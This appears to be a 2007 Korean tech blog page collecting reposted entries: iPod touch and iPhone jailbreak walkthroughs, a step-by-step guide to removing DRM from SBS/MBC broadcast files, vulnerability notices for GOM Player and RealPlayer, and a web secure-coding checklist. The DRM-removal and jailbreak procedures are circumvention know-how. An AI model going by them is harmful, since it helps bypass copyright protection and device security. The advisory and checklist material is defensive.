만약 지금 해킹이 된 1.1.1 아이팟 터치를 가지고 계시고 이 분야에 조금 익숙하신 분이라면 아주 간단합니다. 해킹이 된 상태에서 인터넷에 연결된 상태에서 아이팟의 installer를 에서 install - tweak(1.1.1) 및에 있는OktoPrep 이라고 하는 프로그램을 실행시킵니다. 그 다음에 아이튠스를 통해서 아이팟을 1.1.2로 업그레이드 시키고,http://conceitedsoftware.com/iphone/site/112jb.html 에 있는 파일을 다운 받아서 들어 있는 (Readme.txt의 내용은 가볍게 무시해주십시오. 너무 자세해서 오히려 머리가 아픕니다)windows.bat을 실행시키고 나와 있는 대로 하면 됩니다. 단,Java Runetime Envirnment가 설치 되어 있어야합니다.

2. Step by Step 버젼입니다.

*준비물(반드시 확인 요망)

1. 아이팟 터치
2. 버젼은 반드시 1.1.1
3. 1.1.1 상태에서 jailbreak 이 되어 있을 것
-- 1.1.1 jailbreak 방법에 대해서는 기존에 있는 글들을 참고해주시기 바랍니다. 저는 GUI 가장 최신 버젼으로 하였는데, 그 이후로 사파리에서 한방에 접속해서 하는 방법이 있는 것 같습니다.
4. Java Runtime Environment가 설치되어 있을 것.


** 해킹 방법
1. Jailbreak이 된 아이팟을 가지고 installer에 들어갑니다.
2. 인터넷이 연결된 상태에서 아래에 있는 "Install" 버턴을 누릅니다.
3. 메뉴를 쭉 내려서 "Tweak(1.1.1)"을 찍습니다. (그 아래에 있는 그냥 Tweak 말고...)
4. 나오은 패키지 중에서 "OktoPrep"이라고 하는 프로그램을 실행시킵니다.
5. 실행이 종료되면 준비가 일단 끝납니다.

6. 이제 Ipod touch를 컴퓨터와 연결하고 Itunes를 실행시킵니다.
7. Ipod 화면에서 'update'를 누르면 Itunes가 알아서 필요한 절차를 통해서 다운로드 받고 업글을 시킬 것입니다.
8. 업글이 완료되면...아마도 오래만에 아이콘의 갯수자 팍 줄어든 썰렁한 아이팟 1.1.2를 보시게 될 겁니다.

9. 해킹에 필요한 프로그램을 다운 받습니다.
- http://conceitedsoftware.com/iphone/site/112jb.html
10. 압축을 임의의 폴더에 풉니다.
11. Intunes는 종료시키고 아이팟은 계속 컴퓨터와 연결한 상태로 두십시오.
12. 압축물을 푼 폴더에서 windows.bat를 실행시킵니다.
13. 비밀 번호를 입력하라고 하는데 특별히 건드린 적이 없다면 써 있는 alpine를 그대로 쓰시면 됩니다. 아래에 있는 "jailbreak" 버튼을 누릅니다.
14. 10분 정도 두고 있다보면 '아이팟 터치를 리붓하세요'라고 하는 메세지가 나옵니다.
15. 아이팟의 전원버튼을 길게 눌러서 '밀어서 전원끄기'라는 말이 나오면 화살표를 옆으로 밀어서 종료시킵니다.
16. 다시 파워버튼을 눌러서 키면 자동으로 아이팟이 리붓을 할 것입니다.
17. 이 과정을 무사히(?) 마치면 Installer가 떡하니 설치된, 해킹된 아이팟 터치를 발견하시게 됩니다.
Trackbacks 0 : Comments 0

Write a comment


[본문스크랩] SBS MBC MS DRM 크랙 해제 하기

┃ Application 2007.11.16 20:47

SBS drm 크랙 해제 방법 입니다.

* 저작권 공지 : 개인적 이용만 바랍니다. 상업적 의도 없으니 저작권 침해니 뭐니 패스~ 그래도 문제된다면 정정당당하게 저작권 업체에서는 이메일 등으로 문의하시오 ! 합당한 이유가 된다면 글을 편집시키겠소

0. 시스템 환경 설정

윈도우 미디어 9~10 등에서 가능 (11버전 등은?)
추가 환경설정 아래 일본어 번역 참고 (↓↓★시스템 환경★DRM(디지털 저작권 관리)의 해제 for Automate unDRM )

1. DRM 파일 다운 받기

SBS 해당 파일을 다운 받습니다. Webma2 등으로 멀티미디어 주소 (mms:// ... .asf) 알아내어,
NetTransport 4분할 ↑옵션 등 으로 고속 다운받음 (전체 재생시간 2시간정도 되는거 30분 만에 전송 완료 <- 2시간/4 = 30분 정도)

2. DRM파일 윈도우미디어 열기 하여 라이센스 발급받기

윈도우 미디어 옵션 - 개인정보 - 라이센스키를 자동으로 취득 체크 합니다. 그러면, 해당파일 윈도우 미디어로 열기 하면
위 처럼 SBS 로긴창이 떠서 로긴하면 라이센스 발급 성공 합니다. 그리고, 재생을 누르지 마세요 ! (이유 확인 안함)

3. DRM 파일 해제 크랙 하여 NoDRM 파일 만들기

설명이 귀찮아 한장의 이미지에 담았습니다. 아래 이미지 1 ~ 5번까지 따라해 보세요. (캡쳐하고 편집하고 좀 번거롭네요 ^^;;;)

* 최화정의 보이는 라디오 인지 고릴라 TV인지 뭔지 실행되는거 보이시죠? ( NoDRM 파일 생성 성공 )
여기까지 오시면 성공한 겁니다 ! 축하합니다 ! !

참고이미지

그럴싸 한데? 고양이 (ㅅ)_(ㅅ)

퍼갈 땐 살포시 댓글을 남겨주는 센스~ ^.^


퍼갈 땐 댓글을~ by양샘^.^


★시스템 환경★

DRM(디지털 저작권 관리)의 해제 for Automate unDRM

더보기

▼▼▼▼



Trackbacks 0 : Comments 0

Write a comment


Flash 어플리케이션 테스팅 - OWASP 2007

┃ Application 2007.11.13 01:21

출처 : http://coderant.egloos.com/3929192

Flash 어플리케이션 테스팅 - OWASP 2007

플래쉬도 점점 취약점이 나오면서 위험해지는 어플리케이션이 되어 가고 있습니다.
OWASP에서 플래쉬 어플리케이션 테스팅에 대한 문서입니다.

[다운로드] flash_App_testing_Owasp07.pdf
Trackbacks 0 : Comments 0

Write a comment


아이폰(iPhone) 1.1.1 한방에 해킹

┃ Application 2007.11.03 23:05

출처 : http://nerd.egloos.com/3465926

아이폰(iPhone) 1.1.1 한방에 해킹

얼마전에 iPhoneDev팀이 TIFF 취약점을 이용해서 JailBreak를 성공하였다는 소식을
듣고는 펌웨어 1.1.1로 업그레이드 해서 해킹해야 겠다는 욕구가 불타올랐다. 그런데
대부분의 해킹 가이드가 펌웨어 1.1.1로 출시된 제품에 대해서만 성공을 보장했기에
해킹을 시도하기가 좀 부담스러웠다. 나처럼 1.0.2 에 온갖 해킹을 다 저질러논 사람들이
시도한 결과도 성공보다는 실패가 대부분이어서 1.1.1로 업그레이드 하려는 생각은
거의 안하고 있었다.

그런데 며칠전에 http://hacktheiphone.com 에 가니 jailbreak에 3rd Installer까지
설치해주는데 한방에 가능한 방법이 소개되었다. 갑자기 해봐야 겠다는 의지가 굳어
지더니 벌써 난 그 동영상을 2-3번 보면서 모든 과정을 머리속에 넣고 있었다.
아래는 그 한방에 가능한 동영상이다.



동영상을 보면 크게 액티베이션이 비활성화 되어 있는 상황에서 무선랜을 세팅하기 위해
Special 코드를 넣고 무선랜을 세팅한 후에 Safari로 jailbreakme.com에 접속하여
TIFF Exploit을 이용한 jailbreak, 3rd installer를 설치하는 것이다.

여기서 중요한 것은 내 아이폰처럼 1.0.2 펌웨어로 사용중인 녀석을 1.1.1로 업그레이드
시킬때 단순 업그레이드가 아닌 완전 복구 후 업그레이드를 시켜야 한다는 것이다.
그리고 반드시 무선랜이 작동하는 공간에서 jailbreakme.com에 접속해야 한다.

완전복구란 아이폰의 Home 버튼 + Sleep/Wake 버튼을 계속 누르고 있으면 Power Off
메세지가 나오고 계속 더 누르고 있으면 Reset 되면서 "Connect to itunes" 라는 메세지가
나오고 나서 아이튠스를 연결하여 복구&업그레이드를 하는 것이다. 완전 복구를 거치면
깨끗한 1.1.1 버젼의 아이폰이 되는 것이다. 이 상태에서 위의 동영상과 같은 과정으로
한방핵을 하면 쉽게 액티베이션, 3rd Installer 설치가 가능하다.

이미 Installer를 통해 BSD Subsystem과 OpenSSH를 설치하였다면 YouTube의 활성화는
/var/root/Library/Lockdown 밑에 3개의 파일만 덮어 써주면 된다. ( youtube_files.zip )
Installer를 통해 AnySim을 설치하고 Sim Unlock 하는 과정은 귀찮아서 패스했지만
원하시는 분들은 http://hacktheiphone.com 을 참고하면 된다.

Trackbacks 0 : Comments 0

Write a comment


곰 플레이어 보안 업데이트 출시

┃ Application 2007.11.01 01:40

출처 : http://swbae.egloos.com/1659973

곰 플레이어 보안 업데이트 출시

보안에 관심있는 분들이라면 아시겠지만, 요새 한동안 곰 플레이어의 0-day 취약점이 있었습니다. 해외 보안 사이트에 올라왔던 곰 플레이어 0-day proof-of-concept 는 다음과 같습니다.

위의 버전은 영문플레이어의 버전이라 한글 버전과 차이가 납니다. 영문판은 2.1.6 이, 한글판은 2.1.7 이 최신이었죠.
그러나 문제의 원인인 GomWeb3.dll 은 모두 1.0.0.12 입니다.

해외 보안 사이트에 poc 가 공개된지 며칠 지나지 않아 그레텍에서 곰 플레이어 최신 버전을 내놓았습니다. 최신 버전의 GomWeb3.dll 을 보면 1.0.0.13 으로 한단계 버전업이 된 것을 확인할 수 있습니다.


제 경우 최신 업데이트 설치 후 곰 플레이어에서 F1 을 눌러 버전 정보를 확인해보니, 2.1.8.3682 (Unicode) 라고 나오는 군요. 여러분도 버전을 한번 확인해서 저 버전보다 낮다면되도록 신속히 업데이트 해주시는게 좋겠습니다.
Trackbacks 0 : Comments 0

Write a comment


RealPlayer playlist name stack buffer overflow

┃ Application 2007.10.24 04:34

출처 : http://fullc0de.egloos.com/3449991

RealPlayer playlist name stack buffer overflow

설명

RealNetworks 사의 RealPlayer는 사용자들이 자신의 컴퓨터나 원격지에 있는 오디오/비디오를볼 수 있도록 해주는 멀티미디어 소프트웨어임. 이 제품에서Database Component로 제공되는 RealPlayer Database Component MPAMedia.dll은 내부적으로 재생목록 이름을 제어하는 과정에서 버퍼 오버플로우를 발생시킴. 특정한 재생목록 파일을 RealPlayer로 가져오기 위해 Ierpplug.dll을 제공하는 RealPlayer IERPCCtlActiveX 컨트롤을 사용함. 이것은 버퍼 오버플로우를 발생시킴. 현재 해당 ActiveX 컨트롤은 RealPlayer 버전 9부터 최신 버전까지 영향을 미침.

악의적인 해커는 특수하게 제작된 HTML 문서를 방문자들에게 보여줌으로써 원격에서 피해시스템의사용자 권한으로 시스템 상에서 임의의 코드를 실행할 수 있음.

영향

RealPlayer 버전 9부터 최신 버전

해결책

RealNetworks사에서 제공하는 Update 설치

http://service.real.com/realplayer/security/191007_player/en/

IERPCCtl ActiveX 컨트롤 사용을 중지

{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5} CLSID를 가진 키를 제거함.

인터넷 환경에서 ActiveX를 사용하지 않음.

참고사이트

http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer

http://service.real.com/realplayer/security/191007_player/en/

http://www.securityfocus.com/bid/26130

http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.html

http://support.microsoft.com/kb/240797

<출처: www.kb.cert.org>

============================================================================

대책부분에 보시면 ActiveX를 아예 사용하지 말라는 말이 있습니다. ^^ 확실하네요 ㅋ

해당 취약점은 이미 익스플로잇이 제작되어 사용되고 있다고 합니다. Trojan.Reapall이라는 트로이목마가 이 취약점을 이용한 익스플로잇을 사용하며 결과적으로 Trojan.Zonebac 이라고 명명된 트로이 목마를 전파하기 위한 용도로 사용되고 있다고 하네요. 하지만 국내에서는 크게 영향을 미치지 못할 듯 합니다. 뭐 여러가지 이유가 있겠지만 가장 큰 이유는 RealPlayer를 사용하는 유저들이 많이 않다는 것 아닐까요? @_@;;


추가: 이와 비슷한 취약점이 예전에도 있었다고 합니다.
Buffer Overflows in RealPlayer and HelixPlayer
Trackbacks 0 : Comments 0

Write a comment


adobe readerd 취약점의 실체

┃ Application 2007.10.12 15:32
Trackbacks 0 : Comments 0

Write a comment


엑셀2007 계산 오류 버그 & cisco장비 주소처리 버그

┃ Application 2007.10.07 15:00

출처 : http://swbae.egloos.com/1643223

엑셀 2007 의 계산 오류 버그 - http://blogs.msdn.com/excel/archive/2007/09/25/calculation-issue-update.aspx(65,535를 화면에 100,000 으로 표기하는 문제)

Cisco 장비의 127.0.0.0/8 루프백 주소 처리버그 - http://www.cisco.com/warp/public/707/cisco-sr-20070926-lb.shtml(외부 네트워크에서 들어오는 127.0.0.0/8 주소의 패킷을 처리하는 문제)

Trackbacks 0 : Comments 0

Write a comment


웹 어플리케이션 해킹(Web Application Hacking)에 대비한 프로그램 코딩법

┃ Application 2007.10.03 14:18

출처 : http://blog.naver.com/jeha5/100042600716

아래 기술된 것들은 프로그램 하시는 분들이 프로그램 코딩시 해커들에게 노출 될 수 있는 프로그램 제작에 대하여 프로그램 설계 및 코딩시에 주의 하여야 할 점들을 설명하고 있습니다. 프로그램어들이 시스템 설계시 높은 보안을 준수하기 위해서 꼭! 참고를 하셨으면 하는 마음으로 글을 올려 봅니다.

-------------------------------------아 래---------------------------------------
---------------------------------------------------------------------------------
1. 확인되지 않은 파라미터 사용하는 취약점

클라이언트로부터 웹 어플리케이션이 요청을 받았을 때 그 요청이 적절한 값인지 여부를 검증하지 않음으로 인해 백엔드에 존재하는 허가되지 않은 자원에 접근할 수 있는 취약성
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
2. 부적절한 접근 통제

인증되지 않은 사용자가 시스템에 접근하여 중요한 파일 읽거나 권한없는 기능들을 수행할 수 있는 취약성, 예를어 허가되지 않은 사용자가 웹 요청을 통해서 유닉스 시스템의 /etc/passwd 파일을 읽거나 원도우 시스템의 웹루트 디렉터리를 읽을 수 있는등의 경로 유출(Path Traversal)을 허용하는 취약점
----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
3. 부적절한 계점과 세션 관리

계정에 대한 증명(Account Credential)과 세션 토큰이 적절히ㅣ 보호되지 못함으로 인해 패스워드나 키, 세션 쿠키 그리고 다른 토큰 등을 악용하여 인증 메커니즘을 무력화 시키거나 다른 사용자의 아이디를 추측할 수 있는 취약성.
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
4. Cross-site Scription 취약점

공격자가 웹어플리케이션을 사용해서 다른 초종 사용자에게 자바스크립트와 같은 악성 데이트를 보낼 때 발생한다. 그 데이터는 클라이언트에서 실행되는 Java Script ,VB-Script, ActiveX, Flash 등을 실행하는 코드들이 존재하게 된다. 최종 사용자들은 이렇게 악성 코드들이 포함된 웹 사이트의 링크를 클릭하거나 E-mail에 포함된 내용을 읽거나 게시판에 접속하는 것만으로도 사용자의 환경 설정사항을 변경하거나, 쿠키(cookie)를 가로채거나 사용자들의 PC를 다운시키거나 원하지 않는 광고가 나오게 할 수 있다
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
5. Buffer Overflow Attack

웹 어플리케이션 컴포넌트가 프로세스 제어를 사용하여 입력확인(INput validation)공격으로 웹 사이트에 악영향을 줄 수 있으며 이러한 공격은 CGI 바이너리, 드라이버, 웹 어플리케이션 서버 컴포넌트가 이용된다.
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
6. 명령어 주입 취약점

웹 어플리케이션에서 HTML 형식이나 쿠키, URL 파라미터 형식으로 시스템 명령어를 삽입 허용함으로써 웹 상에서도 시스템 명령을 실행할 수 있는 취약점
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
7. 잘못된 오류 처리 문제

적절하지 못한 오류 처리로 인해 웹 사이트에 데이터베이스 텀프, 에러 코드등과 같은 상세한 내부 메시지들이 사용자에게 노출 하게 되는 취약점이다. 이러한 문제를 이용하여 곧바로 공격을 할 수 있는 것은 공격의 정보를 제공하게 된다.
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
8. 안전하지 않은 암호화 메커니즘 사용

웹 어플리케이션에서 암호화 기법에 의해 데이터베이스에 저장되는 패스워드, 신용카드 번호, 계정 기록과 같은 중요한 정보가 구현상의 오류 때문에 발생하는 보안 취약점
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
9. 원격 관리 취약점

웹 어플리케이션을 관리하기 위해 제공되는 강력한 기능을 갖는 원격 관리 도구는 데이터, 그리고 웹 사이트의 컨텐츠들을 관리하므로, 이러한 강력한 기능은 공격자들의 주요 목표가 되며, 또한 취약점이 될 수 있다.
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
10. 웹과 어플리케이션 서버의 잘못된 설정

웹 서버와 어플리케이션의 구성 설정은 보안 측면에서 중요한 의미를 가지는데 이러한 구성 설정을 여러 가지 요인으로 적절하지 못한 구성을 갖게 되는 취약점
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
11. 웹 어플리케이션 설계 지침

입력과 출력을 확인할 수 있게하라,
사용자의 입력과 출력은 시스템에 악의적인 페이로드의 경로를 제공한다.
모든사용자 입력과 출력은 점검되어 확인되어야 한다. 시스템의 입력과 출력처리에 대한 명확한 전략은 규정된 문자만을 허용 하고 그렇지 않은 데이터를 버려야 하는 것이다 만약에 주민번호 입력을 해야하는 란이라면, 13자리만 필요하다. 더 많은 자리 수를 입력할 수 있게 된다면 악의적 공격에 이용될 수 도 있는 것이다. 또한 숫자가 아닌 문자를 사용할 필요도 없을 것이다..
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
12. 안전하게 작업을 마무리 하게 하라.

보안 모델은 한 작업이 실패 되었을 때, 그 작업이 종료되어야 한다. 말하자면, 한 작업이 실패되었다면, 연속된 작업이 허용되는 것보다 모두 거부되는 것이 바람직하다. 예를 들어 사용자 인증에서 사용자 인증 엔트리 요청이 처리 될 수 있다면, 널 인증 분류나 negative로 반환되지 말아야 한다.
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
13. 간단함을 유지하라,

정성스럽게 만들어진 복잡한 보안 통제 방법은 어차피 사용자 기반이기 때문에 사용자가 사용하는데 어려움을 느끼며 통괏킬 것이다. 종종 가장 효과적인 보안은 가장 간단한 보안이라고 한다.
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
14. 신뢰된 컴포넌트를 재사용하라..

모든 시스템 설계자들이 당신이 생각하는 문제에 대해 동일하게 고민하고 있다. 또한 많은 비용을 투자하여 투자를 해 왔다. 그러므로 신뢰된 컴포넌트를 다시 사용하는 것이 가장 안전하다고 할 수 있다. 다른 사람들이 사용하여 증명된 것을 사용하는 것이 더 효과적이라 할 수 있을 것이다.
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
15. 앞을 보며 설계하라

모든 구성요소가 100% 완벽하게 동작한다고 예상하는 것은 실현 불가능한 일이다. 아무리 완벽하게 설계된 시스템이라고 할 지라도 문제가 발생하기 마련이며 그에 대한 계획이 세워져 있어야 한다. 항상 차선책을 생각하며 설계하는 지혜가 필요하다.
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
16. 가장 취약한 부분부터 공격은 시작된다.

단지 몇 군데만을 확실하게 보안을 적용했다고 안심할 수 없다.. 공격은 수 많은 구조 가운데 가장 취약한 곳만을 노리고 시도된다. 그러므로 전체적으로 살펴보고 예방하는 자세를 키워야 할 것이다.
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
17. 권한을 세분화하라

광범위하게 권한을 설정하게 되면, 공격자가 여러 장소를 다니게 만드는 계기를 제공한다. 따라서 권한을 세분화여 필요한 부분만을 허용하고 그것으로 인하여 보다 효과적인 권한 권리를 할 수 있게 한다.

Trackbacks 0 : Comments 0

Write a comment